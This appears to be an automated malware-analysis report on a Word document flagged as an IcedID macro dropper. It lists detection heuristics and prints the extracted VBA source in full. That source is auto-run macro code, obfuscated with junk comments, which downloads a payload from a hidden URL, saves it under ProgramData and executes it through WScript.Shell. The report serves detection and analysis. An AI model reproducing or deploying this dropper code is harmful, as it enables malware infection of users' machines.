MALICIOUS
Risk Score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings)
  Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script: Set wNXhE = CreateObject("Script" + XyYeT)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  Matched line in script: Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every extracted URL was labelled "In document text (OOXML body / shared strings)".
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11682 bytes |

SHA-256: 711742aebdac67cc97fff7d035529c1f6aebeef013a0ebef86bc7bd4df780584

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sgCej"
Sub zMYMk(jPBDB, Optional ByVal uoksw As String = "c:\programdata\MrUJO.txt", Optional ByVal XyYeT As String = "ing.FileSystemObject")
' Narcosis
' Unbiassedly
' Courthouse importance
' Abnormality damn subpoenaed
' Conceptualisation shortcoming hatchbacks
' Uncrackable humanise
' Concuss battled theologists buddy harvester
' Humankind angle
' Cheeses
' Exhibitor instantly abhorred
' Noxiously
' Nutrients
' Sunbeams me
' Callowness eager
Set wNXhE = CreateObject("Script" + XyYeT)
' Returnees breakfasts deprecation occurred peachiest robbing
' Differential scurry
' Headman shingles alkali
' Cordage esthete discus polysyllable emphasising hatless
' Bread chatting cognisance
' Rotationally confirmations
Set rlJnY = wNXhE.CreateTextFile(uoksw)
' Predictors
' Ablates nobility greengages
' Gyro treating resolvable viscose
' Titans gashed unpunished breakneck
' Cockatrice overact altimeters
rlJnY.WriteLine jPBDB
' Chippings conclude perdition
' Preliminaries fatigued
' Sods arose slaving villagers
' Twined uncheckable his furry mac
' Weightlifter ascender piece pouring
rlJnY.Close
' Effusion dioxin
' Recombine transfers
' Scooping queasy wearily
' Cayman trickier blameable
' Broody crazed appearances
' Precisely incandescent
' Custodians consistency meddlers
' Rightwinger impassioned
' Tribesman sentencing fluorocarbon peer
' Enclose ramification translatable juggle
' Sleepless nabbed arrowhead
' Malachite apologia
' Ardently uncover aristocrat undercoating
' Nostalgic workhorses numbly
' Dueller proletarians
' Denver odourless cubs airing annihilating
' Dressings becks owlish
' Judge welltimed hypocrites enjoyments
' Asserted etymologists trends
' Resettling screamer
' Illtreated unsustainable unsteadily
' Boo
' Moments sounds metallurgy
' Column
' Sparetime drubbed beadyeyed
' Looney weighbridge obscureness
' Sigmoid midmost kindliest mutely
' Speeches doings manly homosexuality
' February magnetodynamics
' Emotionally replaces castigate radon aptly laboured
' Requite targeted differing premiums
' Entices arts pharmaceutical
End Sub
' Posthumous wavered eyesight extending
' Indoctrination skyward beefcake motorways
' Bedfellow dont futurism sensational
' Unbolt unobtainable alternates
' Maturing delaying
Sub AutoOpen()
' Tempters blotch warmonger
' Forewarning poultice springiest inks presupposition
' Picnickers
' Propagated limitless thursday
' Soots machinist worksheets transfigured
' Eight barbarians bevel underestimates
' Facility lazily
' Debts limelight flanking
' Midafternoon treble ranging footrest
' Utilitarianism frustrates geomorphological stained
' Justifiability slump
' Traumatise milan
' Apprehended patriotism devises conformation prodigies strategy parentheses
' Privatised aeronautic appraisingly gunning land
' Condense stuffier tidbit stoolpigeon regurgitation
' Blatant
' Diploma boating virology
' Heredity nils newsletter mangled independence industrialised hydra
' Malays wheelers impedimenta valuta
' Foreshores bludgeoned
' Cheap
' Memphis gatecrashing stipulation
' Enshroud recollecting
Dim pyCxX As New FMZUk
' Bramble manages sapient slumbering devolved amicability
' Stapler willow ideologue citrons
' Impartially lemon oiliest
' Reformulating godfather
jPBDB = pyCxX.VhfkK("MSXML2.serverXMLHTTP")
' Mountaineers dedicated
' Consular fab gall
' Decoding deformed antonyms prioritises
' Hornets ox strippers boozed
' Organic fullmoon clans overreach petunia exorcisms
zMYMk YXqlK(jPBDB)
' Carnages singularisation
' Outwitting circumlocution mediates oodles
' Redhanded
' Trumpeted workbench winder unhesitating
' Crummy purveyors exalted berlin
' Terminations beasts defraud flat invaders ante
' Explosive relives easing vastness
' Quietus simmered
' Budging farce hacksaw ionised pronto generalising
' Dimorphism landholdings
' Fielders desiring
' Orchestrations
vxDJF kBNex(0) + "vr32 c:\programdata\MrUJO.txt", "ws"
End Sub
Function wijDG(sYBQC, RLAEI)
' Expurgating
' Strengthens uplifted woodpile
' Harkened judgements
' Shrouds contraindications fingertips vixens ambulant
' Eras gilds dinosaurs terrible
' Type haematological snowdrift sureties grumpy
' Accords alimony consoled cults
wijDG = Split(sYBQC, RLAEI)
End Function
Attribute VB_Name = "wMBfi"
' Set reconversion supermodels
' Distinguishing activism leafless
' Fakers
' Moistening
Function YXqlK(CuKsR)
' Recoded nipples
' Awkwardly kennels helplines interpretational bloodline
' Overspent psychiatrist conservatoire thrush levies
' Peri packable livings
' Flippable capping greatly
' Scheduler centric racists ecstasies
' Trickiest picnicked dumfounding boisterous
YXqlK = StrConv(CuKsR, vbUnicode)
' Ester
' Judiciaries accumulated churning
' Ransomed discomfort
' Lowkey kneedeep remove portrayed
' Incited banality
End Function
' Cocoons think superciliously biosynthesis
' Culmination conductress shopkeeping embarrassment
' Scubas sacred housewife
' Fascinations lay adhesiveness
' Blowup
' Affordable evacuation sisterly
Function JmLHe()
' Hooking cooperated
' Beer heron panjandrum shortcrust bafflingly
' Peking
' Bullocks frustrate internalises broadband
' Cost demographer gondola verandahs anthropic
' Firebombing breccias stabs gravestone sequencers endorses
' Pattern
' Array airwaves
' Cask remaps remanded delict adolescence
' Dragonfly consolations differentiate
' Whiter lambswool shivered participles
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Thunderbolts millstones accommodating
' Climax regattas peddled valhalla divorces
' Company disincentive monocled aspirations franc
' Backrest diffracting earpieces straitjacket perfusion
' Ironmongery behest shouldered reaffirms
' Resolvers reselling dweller calcareous
' Rayed
Function kBNex(TtGdO)
' Blabber slavering disbandment
' Locket nocturne
' Puny
' Serialisation workforces girdled jointing
' Diplomatically mortification motocross
' Paddler facilitate shortening mistreatment candidature
' Phoney caterwauls emissions bashing
' Disaffected
' Antiquaries atomically environmentalists ferry
' Hesitates italian inoperative amicably unsung
aUFwT = JmLHe()
cTrvA = wijDG(aUFwT, "###")
dCMyY = cTrvA(TtGdO)
kBNex = dCMyY
End Function
Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Gorgons pharmacy
' Wrecked mystifies emancipating lobs
' Reconfigures postage proctor glaciologists sermon
' Recoverable metaphysical ongoing atonement spay
' Eden meaning highlight
' Discontinuities damages perniciousness waddle
Function VhfkK(MjLPR)
' Whisking masts
' Yardage worshipping menhir releases gamers unattained
' Unpredicted stoning
' Abrasively comport erred
' Opposite zoology images fetishes booklet
' Educated
Dim eFBsp As Object
' Objective mindful removing sexism
' Foothills ragstoriches
' Egomaniacs beckon unreleasable consequences intact
' Rugby wireless principalities
' Exploiting flatus onagers
' Jawbone manuscript
' Petite castling require unscrewing
' Extradite headpiece unshod
' Abducting stressed
' Pivotal warhead stirring undermines
' Neuter dehydrated sense unturned
Set eFBsp = CreateObject(MjLPR)
' Fetters sectors charitable
' Choirboys peculiarities extolling
' Musicology runner inimitable vehicular
' Biblical obstacle burdock
' Hallucinating totals undergone unattractive sheepskins
' Ingots governs luna riders guanaco boxoffice
' Toasty
' Outpatients beau active barren neared reticular
' Packets sumptuousness
' Tunable curates hatchets arbitrariness
' Toasty slovenly gnawing faultless
' Sixpence frighteners
' Eh rockfall unsettle layman
' Fluids conspiring
' Insolent thoughtless trussed
' Hail deformities enmeshed adduce
' Twee carcases refines
' Hiatuses garnering
' Irrevocable vims dabbled tuners
' Warping transparency artichoke
' Isolates inessential napkins familiarities southward
' Zig goblin sanctified promotions reprint
' Cousinly
bNZVC = kBNex(1)
' Gadgetry linnet
' Swinger
' Wakens spaniels orations
' Gallstones tildes hollows
' Increments cloning
eFBsp.Open "GET", Reverse(bNZVC), False
' Rotor washerwoman rotations comparative complicit inuits
' Expressionistic arsonists
' Moral vinegar lookalikes sitters exemplary
' Associatively twinge forthcoming outages externally contiguity
' Winter nutritionally arboreal
' Blubbered
eFBsp.Send
' Realigned loping mint cringed snowdrops
' Correlating satyrs zesty bushmen
' Hawaiian sword consolidate priorities steeps stirrer
' Pollarded
' Infinities doctored expanding
' Slumps squelch
' Degraded owlet
VhfkK = eFBsp.responsebody
End Function
Attribute VB_Name = "HGhgQ"
Sub vxDJF(FtfkY, uwmNS)
' Indoctrinated
' Insurance notices wherein scowls retransmission undernourishment bitchy
' Deed buffering digests quartered stopped
' Disowning gumboots politeness neonatal obscenely
Set eGqAM = CreateObject(uwmNS + "cript.shell")
' Wriggle
' Chatterbox editable piteously foregrounding
' Overreacting brutes distinct aortas
' Fief parson charisma passable
' Commutation
' Emulated hoped jamboree heist tuns
' Idlers
' Subalterns quorum products
' Generating onesided obscurity amphetamines
' Birefringence obeyed colitis bargains antechamber walkabouts argent empiricist
' Liqueur go wrestled
' Mismanagement absolving ridiculing furriest diode
' Implementers rootings
' Surmount position invertible humanly moves
' Detractor
' Shoulder shimmer
' Initiate gourd auxiliaries scatter dullard layering
' Developmentally confide
' Courtesans barefoot reconfiguring bloomed modifies houseflies
' Passers refuses
' Festered sidelong appraisals sorter presuppose commuted rinds
' Turncoats outages
' Chronicled silenced contort christen briefly
' Gargles resembles tractable peccary
' Undertones reset half snowy causing amir
' Looking
' Analyses slanted
' Donkey urbane bonding beanpole numberplate
' Heroic farflung
' Enigmas nudge uprooted evangelise
' Eliminates portly tufted scrawling
' Unleash
' Crocuses silicate jug revolutionising
' Snail unbuckled bureaucracy
' Generalist unravelling
' Script eradicated
' Bathed largeness
' Stretchy
' Necrophiliac repenting workhouses blackness gnaws abut
' Legends wristbands
' Sergeant jot cursor echidna
' Unsubtly userfriendly intrusions recomputes waste if
' Cultus bee buzzes wrapped
' Percussive newsworthy yellow
' Transparency genera cytotoxic alluvial
' Moorland beadings
' Samoa
' Furtively creatable
' Averting stimuli nutshell
eGqAM.exec FtfkY
' References
' Wallow arisen cymbals
' Retitling manciple frameup ploughshares
' Bulldoze pimpernel
' Uncooked whinnied grandmother
' Shoot matriarchal wrongdoing found derisory testified
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes |

SHA-256: 11d3bddf1588d98eadb6b3847bd9acc0671c63b3619b5fb60edb3ecb4342b02d

Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely